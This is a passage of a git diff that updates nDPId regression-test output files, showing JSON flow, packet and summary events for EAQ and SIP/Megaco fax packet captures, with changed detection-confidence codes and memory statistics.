+00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820952931,"flow_last_seen":1432821039151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820956931,"flow_last_seen":1432821043151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820959095,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820957932,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820954931,"flow_last_seen":1432821041151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","packets-captured":197,"packets-processed":197,"total-skipped-flows":0,"total-l4-payload-len":13245,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":31,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":189,"global_ts_msec":1432821045664} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 197/197 @@ -195,9 +195,9 @@ ~~ total active/idle flows...: 31/31 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5907091 bytes -~~ total memory freed........: 5907091 bytes -~~ total allocations/frees...: 118439/118439 +~~ total memory allocated....: 6040725 bytes +~~ total memory freed........: 6040725 bytes +~~ total allocations/frees...: 121201/121201 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 449 chars ~~ json string max len.......: 922 chars diff --git a/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out b/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out index 164c29ef3..12d6147e1 100644 --- a/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out +++ b/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out @@ -2,34 +2,34 @@ 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1228468937630} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468937630,"flow_last_seen":1228468937630,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1228468937630,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1228468937630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1228468937630,"pkt":"ABgYesP\/AAFbAAaHCABFAABJQq5AAEARunwKIygWChcBKguAC4AANST+IS8xIDxpTVNTPgpUPTU1NTI4MjcxM3tDPS17QVY9RFMvMS81e0FUe019fX19"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468937630,"flow_last_seen":1228468937630,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1228468937630,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468937630,"flow_last_seen":1228468937630,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1228468937630,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1228468937631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1228468937631,"pkt":"ABgYesP\/AAFbAAaHCABFAABJQq9AAEARunsKIygWChcBKguAC4AANSUAIS8xIDxpTVNTPgpUPTU1NTI4MjcxNHtDPSp7QVY9RFMvMS81e0FUe019fX19"} 00792{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1228468937633,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1228468937633,"pkt":"AAFbAAaHABgYesP\/CABFaAEWVmoAAD4R54sKFwEqCiMoFguAC4ABAnAeIS8xIFsxMC4yMy4xLjQyXToyOTQ0IFAgPSA1NTUyODI3MTN7IEMgPSAtIHthdj1kcy8xLzUgIHsgbSB7IHRzIHsgc2k9aXYsYmYgPSAgT0ZGICxFUklfVEVSTUlORk8vbGF3X2NvbnY9b2ZmICwgRVJJX1RFUk1JTkZPL2Rldl9zdGF0ZT1Ob3JtICwgRVJJX1RFUk1JTkZPL2Rldl90eXBlPUNFRTEgfSAsc3QgPSAwIHsgbyB7IG1vPWluLFRETUMvRUM9T04gLCBURE1DL0dBSU49MCxyZyA9ICBPRkYgLHJ2ID0gIE9GRiAgfSAgfSAgfSAgfSB9fQ=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1228468958651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1228468958651,"pkt":"AAglAXLqABEKVkXQCABFAAOJs6ZAAEAR9ssKIzxICiM8ZBPEE8QDdRkjSU5WSVRFIHNpcDowNjE5NjMxNzctaWtodXVlcDViaTEyM0AxMC4zNS42MC4xMDA6NTA2MDt0cmFuc3BvcnQ9dWRwIFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTAuMzUuNjAuNzI6NTA2MDticmFuY2g9ejloRzRiSy5pSWlJaUkuMGEyMzI4MTkuZTlkNGJkDQpUbzogIDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6ICAxIElOVklURQ0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDphbm9ueW1vdXMuaUlpSWlJLjBhMjMyODE5LkAxMC4zNS42MC43Mj4NCkFsbG93OiBJTlZJVEUsIEFDSywgUFJBQ0ssIENBTkNFTCwgQllFLCBPUFRJT05TLCBNRVNTQUdFLCBOT1RJRlksIFVQREFURSwgUkVHSVNURVIsIElORk8sIFJFRkVSLCBTVUJTQ1JJQkUNCkFjY2VwdDogYXBwbGljYXRpb24vc2RwLCBhcHBsaWNhdGlvbi9pc3VwLCBhcHBsaWNhdGlvbi94bWwsIGFwcGxpY2F0aW9uL2R0bWYtcmVsYXkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LUxlbmd0aDogMjQwDQoNCnY9MA0Kbz0tIDE5MSAxMjI4NTAwNzM2IElOIElQNCAxMC4yMy4xLjUyDQpzPUlNU1MNCmM9SU4gSVA0IDEwLjIzLjEuNTINCnQ9MCAwDQptPWF1ZGlvIDE2NzU2IFJUUC9BVlAgOCAxMDMgMTAyDQphPXJ0cG1hcDoxMDMgRzcyNi0zMi84MDAwDQphPXB0aW1lOjMwDQphPXJ0cG1hcDoxMDIgdGVsZXBob25lLWV2ZW50LzgwMDAvMQ0KYT1mbXRwOjEwMiAwLTE1DQphPXNxbjowDQphPWNkc2M6MSBpbWFnZSB1ZHB0bCB0MzgNCg=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 